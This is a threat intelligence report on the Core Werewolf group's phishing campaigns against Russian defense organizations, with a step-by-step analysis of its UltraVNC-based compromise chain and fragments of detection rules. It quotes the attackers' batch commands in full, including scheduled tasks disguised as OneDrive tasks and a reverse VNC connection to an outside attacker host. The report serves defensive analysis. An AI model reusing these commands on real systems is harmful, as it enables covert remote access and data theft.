Core Werewolf targets the defense industry and critical infrastructure
Similar to many other cybercriminals, Core Werewolf takes advantage of legitimate tools to achieve its goals. After penetrating the infrastructure with the help of phishing emails, the threat actors gain remote access by means of UltraVNC, a legitimate program, without applying any malware.
In this article, we will explore the life cycle of the detected Core Werewolf attacks, look into the tactics, techniques, and procedures employed to compromise the target systems, and describe the group’s infrastructure.
The file used in the first attack that we uncovered was uploaded to VirusTotal on August 6, 2021. Curiously enough, the malicious files were always disguised as Microsoft Word or PDF documents, even though these were executables in self-extracting archives. For example,
Прил._7_критерии_оценки_...ГУВП.docx.exe (Appendix 7. Assessment criteria). Hence, the content of the documents did not raise any concern with the user. However, opening the file triggered the background installation of UltraVNC. This enabled the attackers to gain complete control over compromised devices.
The file discovered first contained an order of a defense organization (fig. 1).
The file detected next was posted on December 16, 2021. The phishing document included an internal order by one of the largest joint-stock companies in Russia (fig. 2).
It had been a while before another attack followed. The file was spotted on April 12, 2022 and contained a resume (fig. 3).
The file from the next attack was uploaded on April 18, 2022 and targeted the employees of some defense organizations (fig. 4).
Another file was posted on April 27, 2022 and was dedicated to the military discharge (fig. 5).
In their new attack, with the respective file uploaded on May 8, 2022, the criminals again attached an order of a defense organization (fig. 6).
On May 12, 2022, a new file was published on VirusTotal. This time, the attackers sent methodological recommendations of another defense organization (fig. 7).
The file uploaded on May 27, 2022 again contained an order (fig. 8).
The summer attacks started with a file posted on June 13, 2022. Disguised as a decree of the Government of the Russian Federation, the document amended the state regulation of prices for products supplied under the state defense order (fig. 9).
The next attack, with the file uploaded on June 28, 2022, used some guidelines to victimize the users (fig. 10).
July was marked by an attack that leveraged a document issued by the Department of the Federal Service for Technical and Export Control (FSTEK) of Russia for the Northwestern Federal District. It described the measures to reinforce the protection of information infrastructure facilities in Russia.
The file published on VirusTotal on July 20, 2022 contained another administrative document related to the defense sector.
The file uploaded on July 27, 2022 came as a resume, yet of a different person (fig. 11).
In August, the criminals once again used an order as a phishing document (fig. 12).
In September, the attackers went even further and, instead of some regular order, attached a document marked “For official use only.”
The October attack featured yet another decree of the Government of the Russian Federation. The document introduced amendments to the national program on the development of the nuclear power industry (fig. 13).
The first attack held in November (the malicious file was uploaded on November 2) used a cold supply diagram for a special-purpose high-performance computing complex.
On the following day, a new file was posted, this time containing a set of diagrams.
The next attack in November employed the group’s favored type of document, that is, related to defense industry operations (fig. 14).
The December attack was once again focused on the defense sector employees (fig. 15).
The first attack in 2023 used a request form as a phishing document (fig. 16).
The next attack took place in January. The phishing document provided the methodological recommendations on the exemption from active service of Russian citizens being in the military reserves of the Russian Federation and working in certain organizations, for the period of mobilization and wartime (fig. 17).
In February 2023, the attackers got back to sending resumes as phishing documents (fig. 18).
In March 2023, Core Werewolf once again attached a copy of a document meant for official use only.
On March 20, 2023, one more file was uploaded to VirusTotal with the phishing document targeting defense industry personnel.
April 2023 saw the group’s repeated attempt to use a resume for phishing purposes (fig. 19).
The attack that occurred in May featured yet another order (fig. 20).
In each of the campaigns, the devices were compromised in a similar way. Therefore, the adversary tactics, techniques, and procedures listed in the section below apply to all of the attacks.
Given that the tactics, techniques, and procedures are much the same, let us look into the compromise process drawing on the example of the attack recorded in May.
After unpacking and executing the file
НУВП награждение полный.doc.exe (a list of award nominees) the following actions are performed:
- Delayed expansion of the environment variables is enabled through the following command:
- The environment variables are set as follows (to be further used for command obfuscation):
- A task is created in the Windows Task Scheduler for the daily termination of the process
schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" /tr "taskkill /f /im Virtual.exe /sc daily /st 09:02
- The timeout mode is set at 2 seconds:
timeout /t 2
- The phishing document is copied to the drive from the file opened by the victim:
copy /y "%CD%\go67x37i77J07R07W37O07G77J37T67z77l07H67z87w77M9.VH64z44L84J44O04O24a44d54X64C64q74c44R94y54y74R4" "%CD%\..\nuvp.doc"
- The timeout mode is set at 4 seconds:
timeout /t 4
- The copied phishing document
start "" "%CD%\..\nuvp.doc"opens.
- The executable
UltraVNCis copied from the file opened by the user to the drive named
copy /y "su22Q42Y62S62R72m92H32I82n02z12w72T72M82T82a92q9.HH75f05T55A55m95l65z65l05u15d05y85o15n45E95i25L3" "Virtual.exe"
- A task is created in the Windows Task Scheduler for the daily execution of the file
schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe" /sc daily /st 09:03
- The process
taskkill /f /im Virtual.exe
- The configuration file
UltraVNCis copied to the drive:
copy /y "UltraVNC.ini" "UltraVNC.ini"
- The executable
start "" "Virtual.exe"
- A task is created in the Windows Task Scheduler to start UltraVNC with the server name specified:
schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443" /sc daily /st 09:04
- UltraVNC is started:
start "" "%CD%\Virtual.exe" -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443
This way the attackers not only gain access to the compromised system after the victim opens the malicious file, but also establish persistence by scheduling the tasks. Legitimate software enables the adversaries to gain complete control over the compromised device. In particular, they can copy and exfiltrate files as well as track the user’s actions.
The attackers sought to register the domain names with several registrars, rather than one. They resorted to the services of Russian and foreign registrars, namely:
- Ukrainian Internet Names Center
- Soaring Eagle Domains
- Realtime Register
- Wild West Domains
The adversaries used Russian names to register the domain names, for example, Aleksandr Vladimirovich Petrishev, as well as email addresses hosted by popular Russian services—mail.ru and yandex.ru. They also used mobile telephone numbers provided by online services that enabled them to receive text messages (fig. 21).
It should be noted that the attackers tended to rent the servers located in Russia. This allowed them to avoid getting blacklisted and being detected early.
The Russian-Ukrainian crisis has significantly affected the global threat landscape and demonstrated the importance of implementing both defensive and offensive threat detection. Adversaries are inventing new evasion methods and tend to abandon the use of malware in favor of legitimate tools, including those embedded in the operating system. Such methods have once again proved to be effective in human-operated attacks conducted by APT groups.
Despite the attackers’ using legitimate programs, it is still possible to identify malicious activity in the course of compromise and neutralize the attack in early stages.
The intruders make ample use of the Windows Task Scheduler, including for the daily termination of the UltraVNC process employing
taskkill. Note that
cmd.exe. serves as a parent process to create a task. Given that such combination of actions is far from typical, it can assist in detection:
title: Taskkill Abuse via Task Scheduler
description: Detects taskkill abuse via Task Scheduler as seen in Core Werewolf campaigns
- ' /f'
- ' /im '
Likewise, the Task Scheduler is used to start UltraVNC on a daily basis. To this end, the attackers employ some specific arguments. These arguments can be detected using the following information:
title: Scheduled Task for Malicious UltraVNC
description: Detects scheduled task creation for UltraVNC as seen in Core Werewolf campaigns
- 'autoreconnect '
- 'connect '
More indicators of compromise are available with BI.ZONE Threat Intelligence.
The number of attacks using legitimate tools against companies is constantly growing. Such attacks are not detected by preventive security tools. Hence, threat actors can gain access to the infrastructure unnoticed. In order to discover this type of intrusions, we recommend that companies implement cyber threat detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their SOC.